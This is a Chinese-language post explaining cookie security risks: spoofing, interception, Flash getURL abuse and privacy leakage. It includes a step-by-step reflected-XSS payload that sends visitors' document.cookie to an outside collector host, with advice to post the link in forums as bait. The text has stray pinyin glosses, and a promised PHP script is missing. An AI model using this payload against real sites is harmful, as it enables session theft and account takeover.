Cookie的目的是為用戶帶來方便，為網(wǎng)站帶來增值，一般情況下不會造成嚴重的安全威脅。Cookie文件不能作為代碼執(zhí)行，也不會傳送病毒，它為用戶所專有并只能由創(chuàng)建它的服務(wù)器來讀取。另外，瀏覽器一般只允許存放300個Cookie，每個站點最多存放20個Cookie，每個Cookie的大小限制為4KB，因此，Cookie不會塞滿硬盤，更不會被用作"拒絕服務(wù)"攻擊手段。

但是，Cookie作為用戶身份的替代，其安全性有時決定了整個系統(tǒng)的安全性，Cookie的安全性問題不容忽視。

（1）Cookie欺騙 Cookie記錄了用戶的帳戶ID、密碼之類的信息，通常使用MD5方法加密后在網(wǎng)上傳遞。經(jīng)過加密處理后的信息即使被網(wǎng)絡(luò)上一些別有用心的人截獲也看不懂。然而，現(xiàn)在存在的問題是，截獲Cookie的人不需要知道這些字符串的含義，只要把別人的Cookie向服務(wù)器提交，并且能夠通過驗證，就可以冒充受害人的身份登陸網(wǎng)站，這種行為叫做Cookie欺騙。
非法用戶通過Cookie欺騙獲得相應(yīng)的加密密鑰，從而訪問合法用戶的所有個性化信息，包括用戶的E-mail甚至帳戶信息，對個人信息造成嚴重危害。
（2）Cookie截獲
Cookie以純文本的形式在瀏覽器和服務(wù)器之間傳送，很容易被他人非法截獲和利用。任何可以截獲Web通信的人都可以讀取Cookie。
Cookie被非法用戶截獲后，然后在其有效期內(nèi)重放，則此非法用戶將享有合法用戶的權(quán)益。例如，對于在線閱讀，非法用戶可以不支付費用即可享受在線閱讀電子雜志。

Cookie截獲的手段有以下一些：

（1）用編程手段截獲Cookie。下面分析其手法，該方法分兩步完成。

步驟一：定位需要收集Cookie的網(wǎng)站，對其進行分析并構(gòu)造URL。 首先打開要收集Cookie的網(wǎng)站，這里假設(shè)是http：//www.XXX.net，登陸網(wǎng)站輸入用戶名"<Al>"（不含引號），對數(shù)據(jù)進行分析抓包，得到如下代碼：
http：//www.XXX.net/tXl/login/login.pl？username=<Al>&passwd=&ok.X=28&ok.y=6；
將其中"<Al>"更換為：
"<script>alert（document.cookie）</script>"再試，如果執(zhí)行成功，就開始構(gòu)造URL：
http：//www.XXX.net/tXl/login/login.pl？username=<script>window.open （"http：//www.cbifamily.org/cbi.php？"%2bdocument.cookie）</script>&passwd=&ok.X=28&ok.y=6.
其中http：//www.cbifamily.org/cbi.php是用戶能夠控制的某臺主機上的一個腳本。需要注意的是"%2b"為符號"+"的URL編碼，因為"+"將被作為空格處理。該URL即可在論壇中發(fā)布，誘使別人點擊。

步驟二：編制收集Cookie的PHP腳本，并將其放到用戶可以控制的網(wǎng)站上，當(dāng)不知情者點擊了構(gòu)造的URL后可以執(zhí)行該PHP代碼。該腳本的具體內(nèi)容如下：

將這段代碼放到網(wǎng)絡(luò)里，則能夠收集所有人的Cookie。如果一個論壇允許HTML代碼或者允許使用Flash標(biāo)簽，就可以利用這些技術(shù)收集Cookie的代碼放到論壇里，然后給帖子取一個吸引人的主題，寫上有趣的內(nèi)容，很快就可收集到大量的Cookie。在論壇上，有許多人的密碼就是被這種方法盜走的。
（2）利用Flash的代碼隱患截獲Cookie。Flash中有一個getURL（）函數(shù)。Flash可以利用這個函數(shù)自動打開指定的網(wǎng)頁，它可能把用戶引向一個包含惡意代碼的網(wǎng)站。例如，當(dāng)用戶在電腦上欣賞Flash動畫時，動畫幀里的代碼可能已經(jīng)悄悄地連上網(wǎng)，并打開了一個極小的包含有特殊代碼的頁面，這個頁面可以收集Cookie、也可以做一些其他有害的事情。網(wǎng)站無法禁止Flash的這種作為，因為這是Flash文件的內(nèi)部功能。
（3）Cookie泄漏網(wǎng)絡(luò)隱私
Cookie導(dǎo)致網(wǎng)絡(luò)隱私泄密的主要原因是：!商業(yè)利益驅(qū)動。隨著電子商務(wù)的興起和互聯(lián)網(wǎng)上巨大商機的出現(xiàn)，一些網(wǎng)站和機構(gòu)濫用Cookie，未經(jīng)訪問者的許可，利用搜索引擎技術(shù)、數(shù)據(jù)挖掘技術(shù)甚至是網(wǎng)絡(luò)欺騙技術(shù)搜集他人的個人資料，達到構(gòu)建用戶數(shù)據(jù)庫、發(fā)送廣告等營利目的，造成用戶個人隱私的泄漏。"Cookie信息傳遞的開放性。Cookie文件具有特殊的傳遞流程 和文本特性，在服務(wù)器和客戶端之間傳送未經(jīng)安全加密的Cook-ie文件，易導(dǎo)致個人信息的泄密。

以上都是個人對于cookie安全性的理解，如有遺漏還請大家能夠指正。

最新評論